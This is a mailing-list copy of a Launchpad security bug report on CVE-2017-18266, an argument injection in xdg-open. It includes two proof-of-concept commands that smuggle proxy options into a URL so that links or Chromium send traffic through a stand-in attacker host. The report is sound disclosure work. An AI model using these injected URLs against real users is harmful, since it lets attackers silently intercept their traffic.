[Desktop-packages] [Bug 1772295] [NEW] CVE-2017-18266: argument injection in xdg-open

Sun, 20 May 2018 12:46:36 -0700 

*** This bug is a security vulnerability ***

Public security bug reported:

An attacker can silently set their proxy in browser settings to capture
user's traffic, using a malformed URL in xdg-open.

The following command tries to open Yandex main page though third-party
proxy server.

    env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-
proxy evil-site.example.org:8080'

Another sample of an exploit with Chromium browser.

    env -i BROWSER="chromium %s" xdg-open "http://www.example.com/
--proxy-pac-url=http://dangerous.example.net/proxy.pac";

** Affects: xdg-utils
     Importance: Unknown
         Status: Unknown

** Affects: xdg-utils (Ubuntu)
     Importance: Undecided
     Assignee: Nicholas Guriev (mymedia)
         Status: New

** Changed in: xdg-utils (Ubuntu)
     Assignee: (unassigned) => Nicholas Guriev (mymedia)

** Information type changed from Private Security to Public Security

** Bug watch added: freedesktop.org Bugzilla #103807
   https://bugs.freedesktop.org/show_bug.cgi?id=103807

** Also affects: xdg-utils via
   https://bugs.freedesktop.org/show_bug.cgi?id=103807
   Importance: Unknown
       Status: Unknown

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18266

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to xdg-utils in Ubuntu.
https://bugs.launchpad.net/bugs/1772295

Title:
  CVE-2017-18266: argument injection in xdg-open

Status in Xdg-utils:
  Unknown
Status in xdg-utils package in Ubuntu:
  New

Bug description:
  An attacker can silently set their proxy in browser settings to
  capture user's traffic, using a malformed URL in xdg-open.

  The following command tries to open Yandex main page though third-
  party proxy server.

      env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-
  proxy evil-site.example.org:8080'

  Another sample of an exploit with Chromium browser.

      env -i BROWSER="chromium %s" xdg-open "http://www.example.com/
  --proxy-pac-url=http://dangerous.example.net/proxy.pac";

To manage notifications about this bug go to:
https://bugs.launchpad.net/xdg-utils/+bug/1772295/+subscriptions

-- 
Mailing list: https://launchpad.net/~desktop-packages
Post to     : [email protected]
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to